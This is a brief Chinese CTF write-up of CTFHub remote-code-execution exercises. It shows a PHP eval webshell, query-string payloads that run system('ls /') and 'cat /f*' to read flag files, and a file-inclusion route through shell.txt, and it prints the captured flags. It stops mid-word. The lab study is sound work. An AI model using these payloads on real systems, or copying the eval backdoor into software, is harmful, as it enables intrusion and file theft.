
[TOC]
eval执行1234567 <?phpif (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]);} else { highlight_file(__FILE__);}?>
没有任何绕过,直接执行
12?cmd=system('ls /');?cmd=system('cat /f*');
ctfhub{953435d20ae6652047e620c4}
文件包含
审计代码,发现过滤了flag关键字,include包含文件的内容,根据提示,发现有个shell.txt文件,而且文件内容是接受传参请求,可以利用这个漏洞。
所以思路就是文件包含shell.txt文件,然后传参触发eval函数来rce。
1?file=shell.txt&ctfhub=system('cat /f*');
ctfhub{e95bf56ca09c475de96779f8}
p ...







